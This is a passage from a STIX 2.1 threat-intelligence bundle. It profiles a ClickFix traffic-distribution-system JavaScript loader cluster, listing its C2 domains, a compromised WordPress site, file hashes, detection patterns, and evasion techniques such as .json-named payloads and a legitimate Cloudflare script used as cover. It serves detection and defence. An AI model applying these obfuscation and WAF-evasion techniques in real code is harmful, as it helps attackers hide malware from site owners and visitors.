          "external_id": "T1055.001"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14a84e74-560c-4703-962e-c072ae2213f7",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--642b4f61-d89f-4198-ae67-05ff9b91d4da",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ad75f8-bd6c-41e5-a1f9-7a1c3d61269c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48554838-3e7f-40eb-98ab-4a90b13f8d8f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ae42d1e-a1f1-4bd5-934f-2a49578eaea7",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--653b6fea-cfbf-4c97-966f-1d8c2b2eb920",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9e6c793a-8388-4297-8ed2-4474c868f335",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd29716c-e762-4928-9307-0209edc5b473",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--187c8ef4-e9bf-4100-822e-894f0193b30f",
      "target_ref": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--890c4688-4018-4b9b-853c-eed71012e0bf",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--b25b0d59-610b-4479-8152-ad8d430393e6",
      "target_ref": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4c08bc4-c7cf-4732-8450-1baaf00ea3cb",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--06ebe711-e144-41c8-b6ed-976a9b5049fc",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78ba5691-d7fd-47ec-8a7f-cbac5b5234c6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--47cce175-2625-4713-aa42-5b7bfa35ed01",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0e71275a-95e5-4989-ab53-1d90afe9cccd",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--13f0aada-9f92-48db-a400-084ec547cb57",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc65ad02-7917-4a43-90ae-9c11a4d60759",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--eecca675-f1c7-4c72-b8c9-bf481b1e767c",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cac3e9ea-32c6-44a4-8f43-4ec1b58e5cee",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5773b364-450a-4575-a63d-00a014c1908a",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--165c2be8-c4d6-4389-9a30-88d5d589f88f",
      "target_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c55e08f-9454-482f-8d16-bed6004d6955",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--5552b4e5-d69a-4def-b51d-15f7e14deaef"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abb7fb0a-1315-4d41-9da0-7ba35564e71a",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--06a150f4-ffa1-47e4-beb4-7cc91f50c537"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cb58393-972e-4c23-a3ab-a54d31cf99d1",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--114e81d2-b996-4d5f-a9b1-d55e78b79aa8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35d145b3-e508-46a8-b977-1ddc08409574",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--4dab7fa0-6671-4954-bbf8-78df78f4f939"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a035ec10-2d37-40e2-a8e3-69a3cee9e479",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--f3f3c056-4cf8-469e-8ea2-3529b7c656ad"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b32b8faf-0ec8-4899-9dc6-1380edaa9e28",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--365dbf0a-4202-4c24-9205-4e8455a93a55"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebb9115c-5abd-47d3-a3c2-94509f242bff",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--bf614ebf-b976-44e2-ab21-869b2d5108cc"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebfdf5a8-61f3-4564-a51c-25b0c9cca75c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--3c2812fc-e9a1-4ae8-bf5a-9e1c5398cdb9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46970cf2-09ca-4f37-b814-38434419b9f0",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--905c00c3-d29c-45ae-a260-c7fad3edeea8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d24d8e9-5e69-415c-bd45-73217d1f01d6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--821c74bc-675b-45a3-a335-865f1199c00d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b063fa5-ba16-42fb-a330-dc4744332b1d",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--b9f4edaa-4e36-491a-a2da-9e915da92c16"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32931cc9-182e-4573-a775-a12a0f6f0a7f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--73d46035-d53f-43ac-a23e-1587e08a7c43"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8b93c29e-f1a3-47ac-87d5-d8bc23271c14",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--69a5272e-3422-400a-b74b-d74877c3b104"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure (March 20 proto-build)",
      "description": "Earliest known build of the SL-ADV-007 TDS cluster. Dated March 20, 2026 \u2014 47 days before V3 (May 6) and ~60 days before V1/V2. Confirms the cluster has been active since at least Q1 2026. All core TTPs present: window.__performance_optimizer_v6 guard, synchronous XHR TDS loader, Shadow DOM overlay, 50-language ClickFix lure, localStorage+cookie victim dedup, setInterval(trap, 4000), Function.constructor sandbox escape. Delivered alongside a legitimate Cloudflare RUM beacon script (stuff3.json) as a two-file bundle injected into the4ssst.ca WordPress site.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "shadow-dom",
        "multilingual",
        "proto-build",
        "q1-2026"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--8ff91c87-e1b7-49fe-823f-c9b6108cd46f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "SL-ADV-007-V4: TDS Cluster Proto-Build \u2014 March 20 2026, the4ssst.ca",
      "description": "Earliest confirmed build of the SL-ADV-007 ClickFix TDS cluster. March 20, 2026. Injected into the4ssst.ca cannabis dispensary site. Delivered as two .json-named files: legitimate Cloudflare RUM beacon (cover) + 804KB obfuscated ClickFix lure engine. Establishes cluster active since at least Q1 2026. Core capability set (50-lang lure, Shadow DOM, localStorage dedup) fully present in this earliest build \u2014 not evolved in later versions, only delivery mechanism and obfuscation strategy changed.",
      "first_seen": "2026-03-20T00:00:00Z",
      "last_seen": "2026-03-20T00:00:00Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "multilingual",
        "tds",
        "v4",
        "proto-build",
        "the4ssst",
        "march-2026"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader + ClickFix Engine \u2014 Variant 4 / Proto-build (March 20, 2026)",
      "description": "Earliest known build of the SL-ADV-007 ClickFix TDS loader cluster. Recovered from the4ssst.ca, dated March 20 2026. 804,081 bytes (stuff3b.json), 3,295 lines post dead-code removal.\n\nCIPHER: RC4+Base64 via _0x49c2 decoder. String array _0x3625: 17,443 entries. Rotation offset: 337,271. Base offset: -342.\n\nDELIVERY: Two-file bundle injection:\n  stuff3.json (31,169 bytes) \u2014 Cloudflare RUM beacon script (LEGITIMATE). Webpack bundle, modules 36/173/559/570/613/976. Sends performance telemetry to cloudflareinsights.com/cdn-cgi/rum via navigator.sendBeacon. Used as cover/legitimacy prop alongside the malicious payload.\n  stuff3b.json (804,081 bytes) \u2014 malicious ClickFix TDS loader.\n\nSTRUCTURE:\n- Lines 1-8: file header\n- Line 2: string array _0x3625 (17,443 encoded entries)\n- Line 9: array rotation bootstrap IIFE (_0x3625, 337271)\n- Line 120: decoder _0x49c2 (RC4+Base64, offset -342)\n- Lines 306-379: anti-debug IIFE (integrity checker)\n- Lines 379-625: once-wrapper factory + console-override anti-debug\n- Line 625: _0x211230() entry-point call\n- Lines 626-3237: main ClickFix lure engine IIFE\n  - Lines 627-2062: config dictionary (_0x3971bc)\n  - Lines 2063-2122: 50-language localization map (identical language set to V3)\n  - Lines 2123-2128: localStorage/cookie state setup\n  - Lines 2129-3236: payload functions:\n    _0x363bd9 (\u2261V3._0x466e6): localStorage dedup + document.referrer check\n    _0x95087f (\u2261V3._0x27ea40): DOM element creator\n    _0x404742 (\u2261V3._0x121d95): Shadow DOM host builder (attachShadow)\n    _0x5f1a4b: element factory with className/id\n    _0x3bace6 (\u2261V3._0x5397f8): language detector via navigator.language\n    _0x53aa8c (\u2261V3._0x50e295): TDS XHR + script injector\n    _0x56217f (\u2261V3._0x587964): ClickFix lure renderer (per-locale Cloudflare CAPTCHA)\n    _0x1d8f73 (\u2261V3._0x33532a): setTimeout 30000ms (V4!) 
/ overlay handler\n    _0x579902 (\u2261V3._0x3a8acb): cookie setter + localStorage persistence\n    _0x4c9138 (\u2261V3._0x3b6d88): DOM cleanup handler\n    _0x485c68 (\u2261V3._0x194b13): window.addEventListener message-channel\n    _0x4f02f8 (\u2261V3._0x110bc6): entry-point orchestrator\n- Lines 3238-3295: setInterval(_0x48bb7d, implicit) debugger trap\n\nKEY DELTA FROM V3 (May 6):\n- Auto-dismiss timer: 30,000ms (30 sec) in V4 vs 240,000ms (4 min) in V3 \u2014 operator lengthened the exposure window in later builds\n- String array: 17,443 entries vs 17,914 (V3) \u2014 slightly smaller, possible code pruning\n- Rotation offset: 337,271 vs 311,002 (V3) \u2014 different build\n- Decoder base offset: -342 vs -196 (V3) \u2014 different index base\n- Function count: 14 vs 12 in V3 \u2014 two additional helper functions\n- Delivered as JSON-named files (.json extension) vs .js in later variants \u2014 early WAF/content-type evasion attempt\n- Paired with legitimate Cloudflare RUM script as legitimacy cover\n- .json extension on both files: likely to evade JS-specific WAF rules",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "rc4-b64",
        "shadow-dom",
        "multilingual",
        "proto-build",
        "json-extension-evasion",
        "cloudflare-rum-cover",
        "v4",
        "march-2026"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads",
        "user-interface-spoofing"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Cloudflare RUM beacon (stuff3.json) \u2014 used as legitimacy cover",
      "description": "Legitimate Cloudflare Real User Monitoring beacon script (31,169 bytes). Webpack bundle, modules: 36 (sendObjectBeacon), 173 (web-vitals: CLS/LCP/FCP/TTFB/FID/INP), 559/570/613/976 (performance observers). Sends telemetry to https://cloudflareinsights.com/cdn-cgi/rum via navigator.sendBeacon or XMLHttpRequest fallback. data-cf-beacon attribute used for site token. NOT malicious in itself \u2014 included in the two-file injection bundle alongside stuff3b.json to make the bundle appear as routine Cloudflare analytics traffic. Classic legitimacy-prop technique: pair malware with a recognisable, trusted script to reduce analyst suspicion and potentially satisfy WAF allow-list rules.",
      "malware_types": [
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "legitimate-tool-abuse",
        "cloudflare-rum",
        "cover-file",
        "legitimacy-prop",
        "v4"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "capabilities": []
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--4cf535ed-0ad3-40b1-bb08-427c0d4312d7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "abstract": "Complete SL-ADV-007 cluster timeline V4\u2192V3\u2192V1\u2192V2 (March\u2013May 2026)",
      "content": "Complete chronological reconstruction of the SL-ADV-007 TDS cluster:\n\nV4 (stuff3b.json, March 20 2026) \u2014 PROTO-BUILD. Earliest known.\n  Delivered as .json files alongside Cloudflare RUM cover script.\n  17,443 string entries. Rotation 337,271. Decoder _0x49c2, offset -342.\n  30-second auto-dismiss timer. 14 payload functions.\n  Full 50-language ClickFix engine. Shadow DOM. localStorage dedup.\n\nV3 (stuff2.js, May 6 2026) \u2014 FULL ENGINE BUILD. +47 days.\n  Standalone .js. 17,914 string entries. Rotation 311,002. Offset -196.\n  240-second auto-dismiss (8x longer than V4 \u2014 operator UX tuning).\n  12 payload functions (2 helpers removed/merged vs V4).\n  Full 50-language ClickFix engine retained. Shadow DOM. localStorage dedup.\n\nV1 (god-help-me.js/stuff.js, ~May 12-18 2026) \u2014 LOADER SEPARATION. +55-62 days.\n  Standalone .js. 39,565 string entries (2.3x V3 \u2014 heavy obfuscation increase).\n  Lure UI offloaded to TDS second-stage (operator splits concerns).\n  4 anti-debug layers. /jsrepo endpoint. 2 TDS domains.\n\nV2 (stuff1.js, ~May 18 2026) \u2014 DELIVERY EVOLUTION. +62 days.\n  WordPress bundle-prepend. Loader CLEARTEXT (no obfuscation on injection mechanism).\n  758 string entries (anti-debug only). /teamrepo endpoint (new path).\n  3 TDS domains (sdntds.shop added). 
Bundle hijack delivery.\n\nEVOLUTION PATTERN:\n  March: .json extension evasion + CF RUM cover (WAF bypass focus)\n  May 6: Extension dropped, timer increased, minor code cleanup\n  May 12+: Lure separated from loader, obfuscation massively increased\n  May 18: Loader cleartext + bundle hijack (stealth through legitimacy vs obfuscation)\n\nSHARED FINGERPRINTS (all 4 variants):\n  window.__performance_optimizer_v6 dedup guard\n  Synchronous XHR GET + createElement('script') + .text + head.appendChild\n  Math.random() cache-buster on TDS URL\n  setInterval(debugger_trap, 4000)\n  Function.constructor('return this') sandbox escape\n  RC4+Base64 cipher (obfuscator.io)\n  _0x3625/_0x59bb/_0x490f string array function names\n  50-language localization map (V4 + V3; offloaded to TDS in V1/V2)\n  ntdnewtds.shop + dnsnewtds.shop TDS infrastructure",
      "object_refs": [
        "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
        "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (all variants, confirmed March 2026+)",
      "description": "Primary TDS C2 active since at least March 20, 2026. Shared across V1\u2013V4.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "ntdnewtds",
        "all-variants",
        "march-2026-confirmed"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (all variants, confirmed March 2026+)",
      "description": "Fallback TDS C2 active since at least March 20, 2026.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "dnsnewtds",
        "all-variants",
        "march-2026-confirmed"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "the4ssst.ca \u2014 Compromised WordPress target site",
      "description": "Cannabis dispensary WordPress site confirmed compromised as of March 20, 2026. Two-file bundle (stuff3.json + stuff3b.json) injected into site JS assets. Earliest confirmed victim/host site in the SL-ADV-007 cluster.",
      "infrastructure_types": [
        "hosting-malware"
      ],
      "labels": [
        "compromised-site",
        "wordpress",
        "cannabis-dispensary",
        "the4ssst.ca",
        "victim-host"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--48805e62-ccb9-4904-accf-24ff35396e71",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "File: stuff3b.json \u2014 V4 March-20 loader (804,081 bytes)",
      "description": "Earliest known SL-ADV-007 build. .json extension used for WAF evasion.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = '25e90438c448898c2b8fa0814ccbd0c8' OR file:hashes.'SHA-1' = '85590cac2455a48ef1231a27dca94294de292b96' OR file:hashes.'SHA-256' = '339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "v4",
        "march-20",
        "file-hash",
        "proto-build"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "File: stuff3.json \u2014 Cloudflare RUM cover file (31,169 bytes)",
      "description": "Legitimate CF RUM script used as cover. These hashes match the unmodified legitimate beacon, so they must not be blocked on in isolation; its presence alongside the malicious stuff3b.json is the IOC.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:hashes.MD5 = '4f67ea9205c3ca7c9e04582d3b9bdd1d' OR file:hashes.'SHA-256' = '4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "cover-file",
        "cloudflare-rum",
        "legitimacy-prop"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8cfcf337-0d4c-4f96-ba49-67a7255c1294",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (active since March 2026)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared",
        "earliest-confirmed"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--161124c4-d98f-42d0-87db-b16857807b07",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (active since March 2026)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared",
        "earliest-confirmed"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a4c64c4e-f824-49c4-920c-29a642e7456b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Delivery pattern: malicious JS with .json extension (WAF evasion)",
      "description": "V4 delivers both files with the .json extension instead of .js. This evades WAF rules that inspect or block JavaScript by content-type or extension. Detection heuristic: .json files beginning with obfuscated JS patterns or '!function(){' should be flagged for review. Note that the STIX 2.1 File object has no 'content' property (file content is reached via content_ref to an Artifact), so the file:content clauses in this and the other content-match patterns in this bundle will not evaluate in a conforming STIX pattern engine and must be translated for the consuming content-scanning tool.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:name MATCHES '\\.json$' AND file:content MATCHES '^[;!]?function _0x|^;\\s*function _0x']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "json-extension",
        "waf-evasion",
        "detection-heuristic",
        "v4"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f2efd379-27b0-493f-a58e-3587e75ee694",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "JS artifact: window.__performance_optimizer_v6 (all variants, March 2026+)",
      "description": "Shared dedup guard across all 4 variants. Active since at least March 20, 2026.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '__performance_optimizer_v6']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "shared-ioc",
        "all-variants",
        "attribution",
        "march-2026"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9918948-fad5-4b36-8466-d1a7002c5a63",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Behaviour delta: 30s auto-dismiss timer (V4) vs 240s (V3)",
      "description": "V4 uses setTimeout 30,000ms for overlay auto-dismiss. V3 uses 240,000ms. This 8x increase between the March and May builds suggests operator testing or a preference for a longer victim exposure window. The pattern below is a build-version discriminator rather than a standalone detection: a 30,000ms setTimeout is common in benign scripts, so match it only in combination with the cluster's shared fingerprints such as __performance_optimizer_v6.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'setTimeout.*30000']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "timer-delta",
        "v4-specific",
        "30s",
        "evolution-marker"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9c21e0c6-4300-4fa0-85cf-617f887f4608",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "V4 proto-build: full ClickFix lure engine in obfuscated JS delivered as .json files. Synchronous XHR to TDS + script injection into document.head. Same mechanism as V1-V3.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--09d6b4b8-1ab2-4514-bf39-c2c69277b243",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "RC4+Base64 via _0x49c2. 17,443-entry string array _0x3625, rotation 337,271, base offset -342. All strings, DOM methods, CSS properties, locale text encoded.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d052c8f6-7ff8-4887-beda-6034b4981333",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "TDS endpoint URLs, navigator.language calls and document APIs are all RC4+Base64-encoded throughout.",
      "external_references": [
        {
          "source_name": "mitre-attack",
